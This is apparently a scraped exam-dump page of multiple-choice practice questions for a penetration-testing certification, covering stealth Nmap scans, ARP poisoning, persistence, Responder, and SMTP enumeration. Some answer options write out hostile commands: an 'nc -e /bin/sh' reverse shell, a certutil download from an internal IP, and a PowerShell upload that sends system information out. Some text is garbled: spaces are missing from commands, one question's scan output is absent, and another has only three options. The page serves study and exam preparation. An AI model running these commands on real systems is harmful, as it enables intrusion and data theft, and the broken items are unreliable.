Weekend Special - 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: av54zq84

Exact2Pass Menu

Question # 4

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

A.

nmap192.168.1.1-5–PU22-25,80

B.

nmap192.168.1.1-5–PA22-25,80

C.

nmap192.168.1.1-5–PS22-25,80

D.

nmap192.168.1.1-5–Ss22-25,80

Full Access
Question # 5

A penetration tester wants to scan a target network without being detected by the client’s IDS. Which of the following scans is MOST likely to avoid detection?

A.

nmap –p0 –T0 –sS 192.168.1.10

B.

nmap –sA –sV --host-timeout 60 192.168.1.10

C.

nmap –f --badsum 192.168.1.10

D.

nmap –A –n 192.168.1.10

Full Access
Question # 6

A consultant is reviewing the following output after reports of intermittent connectivity issues:

? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]

? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]

? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]

? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]

? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]

? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]

? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]

? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet]

Which of the following is MOST likely to be reported by the consultant?

A.

A device on the network has an IP address in the wrong subnet.

B.

A multicast session was initiated using the wrong multicast group.

C.

An ARP flooding attack is using the broadcast address to perform DDoS.

D.

A device on the network has poisoned the ARP cache.

Full Access
Question # 7

A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

A.

Create a one-shot systemd service to establish a reverse shell.

B.

Obtain /etc/shadow and brute force the root password.

C.

Run the nc -e /bin/sh <...> command.

D.

Move laterally to create a user account on LDAP

Full Access
Question # 8

A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company’s network. Which of the following accounts should the tester use to return the MOST results?

A.

Root user

B.

Local administrator

C.

Service

D.

Network administrator

Full Access
Question # 9

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?

A.

Multiple handshakes

B.

IP addresses

C.

Encrypted file transfers

D.

User hashes sent over SMB

Full Access
Question # 10

The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

A.

This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.

B.

This device is most likely a gateway with in-band management services.

C.

This device is most likely a proxy server forwarding requests over TCP/443.

D.

This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

Full Access
Question # 11

A consulting company is completing the ROE during scoping.

Which of the following should be included in the ROE?

A.

Cost ofthe assessment

B.

Report distribution

C.

Testing restrictions

D.

Liability

Full Access
Question # 12

A compliance-based penetration test is primarily concerned with:

A.

obtaining Pll from the protected network.

B.

bypassing protection on edge devices.

C.

determining the efficacy of a specific set of security standards.

D.

obtaining specific information from the protected network.

Full Access
Question # 13

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

A.

Implement a recurring cybersecurity awareness education program for all users.

B.

Implement multifactor authentication on all corporate applications.

C.

Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.

D.

Implement an email security gateway to block spam and malware from email communications.

Full Access
Question # 14

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

A.

certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe

B.

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

C.

schtasks /query /fo LIST /v | find /I “Next Run Time:”

Full Access
Question # 15

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

A.

<#

B.

<$

C.

##

D.

#$

E.

#!

Full Access
Question # 16

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

A.

Reach out to the primary point of contact

B.

Try to take down the attackers

C.

Call law enforcement officials immediately

D.

Collect the proper evidence and add to the final report

Full Access
Question # 17

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

A.

Executive summary of the penetration-testing methods used

B.

Bill of materials including supplies, subcontracts, and costs incurred during assessment

C.

Quantitative impact assessments given a successful software compromise

D.

Code context for instances of unsafe type-casting operations

Full Access
Question # 18

A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

A.

VRFY and EXPN

B.

VRFY and TURN

C.

EXPN and TURN

D.

RCPT TO and VRFY

Full Access
Question # 19

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

A.

A quick description of the vulnerability and a high-level control to fix it

B.

Information regarding the business impact if compromised

C.

The executive summary and information regarding the testing company

D.

The rules of engagement from the assessment

Full Access
Question # 20

A company has hired a penetration tester to deploy and set up a rogue access point on the network.

Which of the following is the BEST tool to use to accomplish this goal?

A.

Wireshark

B.

Aircrack-ng

C.

Kismet

D.

Wifite

Full Access
Question # 21

A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

A.

Comma

B.

Double dash

C.

Single quote

D.

Semicolon

Full Access